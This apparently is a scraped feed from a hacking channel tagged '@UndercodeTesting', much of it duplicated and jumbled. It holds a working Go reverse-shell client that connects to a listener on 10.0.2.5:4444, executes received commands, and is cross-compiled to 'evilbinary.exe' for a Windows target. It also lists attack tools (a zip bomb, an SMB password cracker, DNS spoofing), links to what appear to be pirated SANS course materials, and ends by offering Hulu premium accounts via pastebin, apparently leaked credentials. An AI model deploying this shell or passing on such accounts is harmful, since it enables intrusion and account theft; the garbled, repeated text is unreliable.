β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ basic principle / methodology, its utilization how can be audited, and defense -Helpfull tips :
1) 0x0 XXE Attack Methodes | The Quick and Dirty & Defense
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
2) 0x1 Introduction
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
3) 0x2 Restrictions to XML XXE
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Introduction.md
4) 0x3 Summary of Use
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Restrictions_XML_XXE.md
5) 0x4 Everything JAVA
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/JAVA
6) 0x5 Everything PHP
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/PHP
7) 0x6 The 1 Python Thing
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/Python
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ basic principle / methodology, its utilization how can be audited, and defense -Helpfull tips :
1) 0x0 XXE Attack Methodes | The Quick and Dirty & Defense
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
2) 0x1 Introduction
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
3) 0x2 Restrictions to XML XXE
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Introduction.md
4) 0x3 Summary of Use
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Restrictions_XML_XXE.md
5) 0x4 Everything JAVA
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/JAVA
6) 0x5 Everything PHP
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/PHP
7) 0x6 The 1 Python Thing
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/Python
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
OlivierLaflamme/Auditing-Vulnerabilities
In this repository I'll host my research and methodologies for auditing vulnerabilities - OlivierLaflamme/Auditing-Vulnerabilities
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ A Reverse HTTP Shell In Kali Linux:
HEREβS WHAT YOU NEED :
1) Kali Linux Virtual Instance (VirtualBox)
2) Windows 10 Virtual Instance (VirtualBox) -OR-
3) Linux Virtual Instance (VirtualBox)
4) Here is the code for my program, in a file named tcpServer.go:
package main import (
"bufio"
"fmt"
"log"
"net"
"os/exec" "strings"
)
const (
RPORT = "4444"
)
func CheckErr(e error) {
if e != nil {
log.Fatal("Error %s", e)
}
}
func main() {
conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT)) CheckErr(err)
remoteCmd, err := bufio.NewReader(conn).ReadString('\n') CheckErr(err)
// remove newline character
newCmd := strings.TrimSuffix(remoteCmd, "\n")
command := exec.Command(newCmd)
command.Stdin = conn
command.Stdout = conn
command.Stderr = conn
command.Run()
}
π¦After putting together the program I need to compile the client for Windows for my Windows target. This is how it is done below:
> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
π¦ A Reverse HTTP Shell In Kali Linux:
HEREβS WHAT YOU NEED :
1) Kali Linux Virtual Instance (VirtualBox)
2) Windows 10 Virtual Instance (VirtualBox) -OR-
3) Linux Virtual Instance (VirtualBox)
4) Here is the code for my program, in a file named tcpServer.go:
package main import (
"bufio"
"fmt"
"log"
"net"
"os/exec" "strings"
)
const (
RPORT = "4444"
)
func CheckErr(e error) {
if e != nil {
log.Fatal("Error %s", e)
}
}
func main() {
conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT)) CheckErr(err)
remoteCmd, err := bufio.NewReader(conn).ReadString('\n') CheckErr(err)
// remove newline character
newCmd := strings.TrimSuffix(remoteCmd, "\n")
command := exec.Command(newCmd)
command.Stdin = conn
command.Stdout = conn
command.Stderr = conn
command.Run()
}
π¦After putting together the program I need to compile the client for Windows for my Windows target. This is how it is done below:
> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
2) The program works fine except for it is still primitive. I mean by that it
3) can not handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY
4) If you donβt agree with the preceding statement, try setting flags in C#β¦Flags in go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your
5) Here is a basic example of checking for arguments passed via the command line to our program. :
func main() {
// read args
arguments := os.Args
if len(arguments) == 1 {
fmt.Println("Not enough arguments!") return
}
> 1 macbook$ go run tcpServer.go -p 4444
6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output βListening on 4444β¦β, because the value of the pointer to the string flag variable has been set as 4444.
7) LPORT := flag.String("p", "", "port to listen on")
fmt.Printf("lport is %s", *LPORT)
flag.Parse()
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT)) CheckErr(err)
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
3) can not handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY
4) If you donβt agree with the preceding statement, try setting flags in C#β¦Flags in go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your
5) Here is a basic example of checking for arguments passed via the command line to our program. :
func main() {
// read args
arguments := os.Args
if len(arguments) == 1 {
fmt.Println("Not enough arguments!") return
}
> 1 macbook$ go run tcpServer.go -p 4444
6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output βListening on 4444β¦β, because the value of the pointer to the string flag variable has been set as 4444.
7) LPORT := flag.String("p", "", "port to listen on")
fmt.Printf("lport is %s", *LPORT)
flag.Parse()
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT)) CheckErr(err)
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Greatest 2020 Hacking tools-Tracking-backdoor and more...
0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/
3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d
acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/
Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/
findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com
sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r
ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html
admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Greatest 2020 Hacking tools-Tracking-backdoor and more...
0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/
3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d
acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/
Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/
findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com
sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r
ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html
admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
jon.oberheide.org
0trace.py | Jon Oberheide
Jon Oberheide's website
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKING COURSES & TOOLS 2020 :
SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKING COURSES & TOOLS 2020 :
SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦X56 HULU PREMIUMβ
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN